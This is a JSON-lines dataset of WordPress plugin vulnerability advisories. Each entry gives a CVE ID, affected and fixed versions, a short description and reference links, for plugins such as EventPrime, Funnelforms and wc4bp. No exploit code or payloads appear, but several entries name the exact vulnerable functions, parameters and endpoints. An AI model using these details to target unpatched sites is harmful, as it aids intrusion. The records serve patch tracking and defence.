{"CVE_ID":"CVE-2024-1125","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the calendar_events_delete() function in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1124","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the ep_send_attendees_email() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send arbitrary emails with arbitrary content from the site.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12304","slug":"kadence-blocks","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via button block link in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212269\\\/kadence-blocks\\\/tags\\\/3.4.3\\\/includes\\\/blocks\\\/class-kadence-blocks-singlebtn-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212269\\\/kadence-blocks\\\/tags\\\/3.4.3\\\/includes\\\/blocks\\\/class-kadence-blocks-singlebtn-block.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c300c485-e5ab-48b3-99e8-0def5668ef4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c300c485-e5ab-48b3-99e8-0def5668ef4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1321","slug":"eventprime-event-calendar-management","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2. This is due to the plugin allowing unauthenticated users to update the status of order payments. This makes it possible for unauthenticated attackers to book events for free.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4933","slug":"wp-job-openings","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The WP Job Openings WordPress plugin before 3.4.3 does not block listing the contents of the directories where it stores attachments to job applications, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882f6c36-44c6-4273-81cd-2eaaf5e81fa7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882f6c36-44c6-4273-81cd-2eaaf5e81fa7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5877","slug":"affiliate-toolkit-starter","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The affiliate-toolkit WordPress plugin before 3.4.3 lacks authorization and authentication for requests to it's affiliate-toolkit-starter\/tools\/atkp_imagereceiver.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URL's, including RFC1918 private addresses, leading to a Server Side Request Forgery (SSRF) issue.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39ed4934-3d91-4924-8acc-25759fef9e81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39ed4934-3d91-4924-8acc-25759fef9e81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36758","slug":"feedzy-rss-feeds","versionEndExcluding":"3.4.3","description":"The RSS Aggregator by Feedzy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.2. This is due to missing or incorrect nonce validation on the save_feedzy_post_type_meta() function. This makes it possible for unauthenticated attackers to update post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2369394\\\/feedzy-rss-feeds\\\/trunk\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2369394\\\/feedzy-rss-feeds\\\/trunk\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3b916dc-3b94-4319-a805-0ea99d14429f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3b916dc-3b94-4319-a805-0ea99d14429f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8549","slug":"google-calendar-events","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The Simple Calendar \u2013 Google Calendar Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ae3f22-6426-48f7-93e6-c0ad515b329a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ae3f22-6426-48f7-93e6-c0ad515b329a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3156894%40google-calendar-events&new=3156894%40google-calendar-events&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3156894%40google-calendar-events&new=3156894%40google-calendar-events&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156894\\\/google-calendar-events\\\/trunk\\\/includes\\\/admin\\\/notices.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156894\\\/google-calendar-events\\\/trunk\\\/includes\\\/admin\\\/notices.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1123","slug":"eventprime-event-calendar-management","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_frontend_event_submission() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the title and content of arbitrary posts. This can also be exploited by unauthenticated attackers when the allow_submission_by_anonymous_user setting is enabled.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1780","slug":"wc4bp","versionImpact":"3.4.25","versionEndExcluding":"3.4.26","description":"The BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wc4bp_delete_page() function in all versions up to, and including, 3.4.25. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins page setting.","recommendation":"Update to version 3.4.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248127%40wc4bp&new=3248127%40wc4bp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248127%40wc4bp&new=3248127%40wc4bp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc138cbb-2713-4b0a-8e3a-8e1a9266637f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc138cbb-2713-4b0a-8e3a-8e1a9266637f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13358","slug":"wc4bp","versionImpact":"3.4.24","versionEndExcluding":"3.4.25","description":"The BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wc4bp_delete_page() function in all versions up to, and including, 3.4.24. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins page setting.","recommendation":"Update to version 3.4.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244145%40wc4bp&new=3244145%40wc4bp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244145%40wc4bp&new=3244145%40wc4bp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f526f3c-4e9b-4440-b3c3-8541c1be0ba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f526f3c-4e9b-4440-b3c3-8541c1be0ba0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6360","slug":"my-calendar","versionEndExcluding":"3.4.22","description":"The 'My Calendar' WordPress Plugin, version < 3.4.22 is affected by an unauthenticated SQL injection vulnerability in the 'from' and 'to' parameters in the '\/my-calendar\/v1\/events' rest route.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-40\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9371","slug":"branda-white-labeling","versionImpact":"3.4.21","versionEndExcluding":"3.4.22","description":"The Branda \u2013 White Label & Branding, Custom Login Page Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.19\\\/inc\\\/class-branda-admin.php#L1871\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.19\\\/inc\\\/class-branda-admin.php#L1871\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191895%40branda-white-labeling&new=3191895%40branda-white-labeling&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191895%40branda-white-labeling&new=3191895%40branda-white-labeling&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb60e5c8-cbda-4488-816c-a7fdf2b39fd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb60e5c8-cbda-4488-816c-a7fdf2b39fd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2025","slug":"wc4bp","versionImpact":"3.4.20","versionEndExcluding":"3.4.21","description":"The \"BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages\" plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.20 via deserialization of untrusted input in the get_simple_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.4.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da9e79-399e-43e3-ac27-a162861cae71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da9e79-399e-43e3-ac27-a162861cae71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055634\\\/wc4bp\\\/trunk\\\/class\\\/includes\\\/class-request-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055634\\\/wc4bp\\\/trunk\\\/class\\\/includes\\\/class-request-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6222","slug":"quttera-web-malware-scanner","versionImpact":"3.4.1.48","versionEndExcluding":"3.4.2.1","description":"IThe Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks","recommendation":"Update to version 3.4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df892e99-c0f6-42b8-a834-fc55d1bde130\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df892e99-c0f6-42b8-a834-fc55d1bde130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6065","slug":"quttera-web-malware-scanner","versionImpact":"3.4.1.48","versionEndExcluding":"3.4.2.1","description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code","recommendation":"Update to version 3.4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64f2557f-c5e4-4779-9e28-911dfaf2dda5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64f2557f-c5e4-4779-9e28-911dfaf2dda5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1w83xWsVLS_gCpQy4LDwbjNK9JaB87EEf\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13480","slug":"ltl-freight-quotes-fedex-freight-edition","versionImpact":"3.4.1","versionEndExcluding":"3.4.2","description":"The LTL Freight Quotes \u2013 For Customers of FedEx Freight plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238359%40ltl-freight-quotes-fedex-freight-edition&new=3238359%40ltl-freight-quotes-fedex-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238359%40ltl-freight-quotes-fedex-freight-edition&new=3238359%40ltl-freight-quotes-fedex-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b6f7a3-83eb-4352-9db6-ab4b03241702?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9b6f7a3-83eb-4352-9db6-ab4b03241702?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5110","slug":"bsk-pdf-manager","versionImpact":"3.4.1","versionEndExcluding":"3.4.2","description":"The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'bsk-pdfm-category-dropdown' shortcode in versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsk-pdf-manager\\\/trunk\\\/classes\\\/shortcodes\\\/category\\\/category-dropdown.php?rev=2885460#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bsk-pdf-manager\\\/trunk\\\/classes\\\/shortcodes\\\/category\\\/category-dropdown.php?rev=2885460#L36\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60de55c6-e4fa-453e-84bd-309f2887e3cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60de55c6-e4fa-453e-84bd-309f2887e3cb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5419","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_test_mail function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to send test emails to an arbitrary email address.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64248d15-e6a7-442f-b269-e9f629d297d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64248d15-e6a7-442f-b269-e9f629d297d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1478","slug":"hummingbird-performance","versionEndExcluding":"3.4.2","description":"The Hummingbird WordPress plugin before 3.4.2 does not validate the generated file path for page cache files before writing them, leading to a path traversal vulnerability in the page cache module.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512a9ba4-01c0-4614-a991-efdc7fe51abe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/512a9ba4-01c0-4614-a991-efdc7fe51abe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5417","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_update_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify the Funnelforms category for a given post ID.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/148794ea-3bc9-4084-bdb9-6ee63a781a39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/148794ea-3bc9-4084-bdb9-6ee63a781a39?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5416","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete categories.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992fc98f-4b23-4596-81fb-5543d82fd615?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992fc98f-4b23-4596-81fb-5543d82fd615?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5415","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_add_category function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to add new categories.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ec3051e-a5e4-48ee-8f8e-eb5dbc482f33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ec3051e-a5e4-48ee-8f8e-eb5dbc482f33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
